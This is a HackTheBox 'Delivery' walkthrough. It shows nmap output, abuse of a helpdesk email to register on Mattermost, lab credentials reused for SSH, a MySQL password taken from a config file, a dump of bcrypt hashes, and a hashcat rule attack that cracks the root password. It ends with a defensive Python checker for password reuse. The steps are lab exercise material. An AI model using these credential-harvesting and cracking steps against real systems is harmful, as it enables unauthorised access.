HackTheBox - Delivery
Morten Hansen • January 30, 2022
Delivery
mysql, grep, hashcat, rules, email
IP 10.10.10.222
NMAP
nmap -sC -sV 10.10.10.222 | tee NMAP/log
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 9c:40:fa:85:9b:01:ac:ac:0e:bc:0c:19:51:8a:ee:27 (RSA)
| 256 5a:0c:c0:3b:9b:76:55:2e:6e:c4:f4:b9:5d:76:17:09 (ECDSA)
|_ 256 b7:9d:f7:48:9d:a2:f2:76:30:fd:42:d3:35:3a:80:8c (ED25519)
80/tcp open http nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Welcome
BROWSER
Found a website that contained links to http://helpdesk.delivery.htb/ and delivery.htb. Add these to /etc/hosts: 10.10.10.222 helpdesk.delivery.htb delivery.htb.
Sent a ticket to the helpdesk with user email test@test.com and name delivery. This gave a response of:
delivery,
You may check the status of your ticket, by navigating to the Check Status page using ticket id: 8424164.
If you want to add more information to your ticket, just email 8424164@delivery.htb.
Thanks,
Support Team
Tried to log in with the credentials above and it worked.
Then went to http://delivery.htb:8065/signup_email and registered with 8424164@delivery.htb as email, delivery as username and Delivery1! as password.
Then went back to the helpdesk and read the mail that was sent. Copied the verification link for the Mattermost user. After that I could log in to Mattermost and got redirected to http://delivery.htb:8065/internal/channels/town-square.
The front page says maildeliverer:Youve_G0t_Mail!, which works as credentials for osTicket at http://helpdesk.delivery.htb/scp/index.php. Inside we can see it is osTicket (v1.15.1).
Admin's email: maildeliverer@delivery.htb.
Try to log in as maildeliverer over ssh with ssh maildeliverer@10.10.10.222 and password Youve_G0t_Mail!. We get a shell as user.
User/Root GREP-tip
grep -B x # x lines before
grep -A x # x lines after
grep -C x # x lines before and after
maildeliverer@Delivery:/opt/mattermost/config$ cat config.json | grep mysql -A 12
"DriverName": "mysql",
"DataSource": "mmuser:Crack_The_MM_Admin_PW@tcp(127.0.0.1:3306)/mattermost?charset=utf8mb4,utf8\u0026readTimeout=30s\u0026writeTimeout=30s",
"DataSourceReplicas": [],
"DataSourceSearchReplicas": [],
"MaxIdleConns": 20,
"ConnMaxLifetimeMilliseconds": 3600000,
"MaxOpenConns": 300,
"Trace": false,
"AtRestEncryptKey": "n5uax3d4f919obtsp1pw1k5xetq1enez",
"QueryTimeout": 30,
"DisableDatabaseSearch": false
},
"LogSettings": {
mysql -u mmuser --password="Crack_The_MM_Admin_PW"
use mattermost;
select Username, Password from Users;
Gives us
| Username | Password |
|---|---|
| surveybot | |
| c3ecacacc7b94f909d04dbfd308a9b93 | $2a$10$u5815SIBe2Fq1FZlv9S8I.VjU3zeSPBrIEg9wvpiLaS7ImuiItEiK |
| 5b785171bfb34762a933e127630c4860 | $2a$10$3m0quqyvCE8Z/R1gFcCOWO6tEj6FtqtBn8fRAXQXmaKmg.HDGpS/G |
| delivery | $2a$10$Q0j4Zq7K7Q7vCr1KJ806yeWvQ85EpgIC47WHq.okyYnPmOcdleJ0. |
| root | $2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO |
| ff0a21fc6fc2488195e16ea854c963ee | $2a$10$RnJsISTLc9W3iUcUggl1KOG9vqADED24CQcQ8zvUm1Ir9pxS.Pduq |
| channelexport | |
| 9ecfb4be145d47fda0724f697f35ffaf | $2a$10$s.cLPSjAVgawGOJwB7vrqenPg2lrDtOECRtjwWahOzHfq1CoFyFqm |
Crack it with hashcat. We know from the internal Mattermost site that:
@developers Please update theme to the OSTicket before we go live. Credentials to the server are maildeliverer:Youve_G0t_Mail!
Also please create a program to help us stop re-using the same passwords everywhere.... Especially those that are a variant of "PleaseSubscribe!"
So we create a wordlist with pleasesubscribe and crack the hash with hashcat rules: hashcat -a 0 -m 3200 hash wordlist -r /usr/share/hashcat/rules/best64.rule
Password: PleaseSubscribe!21
Then we su to root with the cracked password and get a root shell!
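The Mattermost note quoted above asks for a program that stops people re-using variants of "PleaseSubscribe!". The following is an added example, not part of the original writeup: a check for a password-change hook that rejects candidates which reduce to a banned base after undoing case changes, look-alike substitutions, padding, truncation and reversal. The function names, the banned list and the 0.8 threshold are assumptions.

```python
import re
from difflib import SequenceMatcher
from typing import Optional

# Assumption: bases the organisation has banned; this entry is the phrase
# named in the Mattermost note quoted in the writeup.
BANNED_BASES = ["PleaseSubscribe!"]

# Fold look-alike characters into one class so "1", "i", "l" and "|" compare equal.
CONFUSABLE = str.maketrans({"0": "o", "1": "l", "i": "l", "|": "l", "3": "e",
                            "4": "a", "@": "a", "5": "s", "$": "s", "7": "t"})
MIN_COVER = 0.8  # assumed fraction of the base that must survive in the candidate


def skeleton(text: str) -> str:
    """Lowercase, fold look-alikes, then drop everything that is not a letter."""
    return re.sub(r"[^a-z]", "", text.lower().translate(CONFUSABLE))


def overlap(base: str, cand: str) -> int:
    """Length of the longest run of `base` that appears verbatim in `cand`."""
    matcher = SequenceMatcher(None, base, cand, autojunk=False)
    return matcher.find_longest_match(0, len(base), 0, len(cand)).size


def reused_base(password: str) -> Optional[str]:
    """Return the banned base this password is a variant of, or None."""
    cand = skeleton(password)
    for base in BANNED_BASES:
        key = skeleton(base)
        # Check the reversed form too: reversal is a common mangling rule.
        best = max(overlap(key, cand), overlap(key, cand[::-1]))
        if key and best >= MIN_COVER * len(key):
            return base
    return None


if __name__ == "__main__":
    # Constructed sample candidates, as a password-change hook would receive them.
    for pw in ["PleaseSubscribe!21", "p13a5esubscr1be2022", "correct horse battery"]:
        print(pw, "->", "REJECT" if reused_base(pw) else "ok")
```

Containment on the folded skeleton is deliberately broad, so banned bases should be long phrases; short bases would reject too many unrelated passwords.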
